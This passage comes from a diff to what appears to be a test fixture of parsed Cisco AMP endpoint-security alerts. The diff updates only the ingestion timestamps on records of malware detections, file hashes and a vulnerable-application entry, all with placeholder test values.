Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -1214,7 +1286,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898092700Z", + "ingested": "2021-12-14T14:40:37.784986299Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "code": "1107296258", "kind": "alert", @@ -1307,7 +1379,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898098500Z", + "ingested": "2021-12-14T14:40:37.784986785Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -1393,7 +1465,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898104400Z", + "ingested": "2021-12-14T14:40:37.784987269Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -1479,7 +1551,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898110200Z", + "ingested": "2021-12-14T14:40:37.784987756Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -1560,7 +1632,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898116100Z", + "ingested": "2021-12-14T14:40:37.784988385Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}", "code": "1107296272", "kind": "alert", @@ -1654,7 +1726,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898122Z", + "ingested": "2021-12-14T14:40:37.784988887Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -1740,7 +1812,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898127900Z", + "ingested": "2021-12-14T14:40:37.784989373Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -1826,7 +1898,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898131700Z", + "ingested": "2021-12-14T14:40:37.784989875Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -1916,7 +1988,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898136400Z", + "ingested": "2021-12-14T14:40:37.784990354Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2006,7 +2078,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898142300Z", + "ingested": "2021-12-14T14:40:37.784990836Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2092,7 +2164,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898148100Z", + "ingested": "2021-12-14T14:40:37.784991318Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2178,7 +2250,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898152600Z", + "ingested": "2021-12-14T14:40:37.784992024Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2258,7 +2330,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:32.898157500Z", + "ingested": "2021-12-14T14:40:37.784992530Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}", "code": "1107296279", "kind": "alert", @@ -2362,7 +2434,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898162800Z", + "ingested": "2021-12-14T14:40:37.784994722Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2448,7 +2520,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898167100Z", + "ingested": "2021-12-14T14:40:37.784995219Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2534,7 +2606,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898171800Z", + "ingested": "2021-12-14T14:40:37.784995712Z", "original": 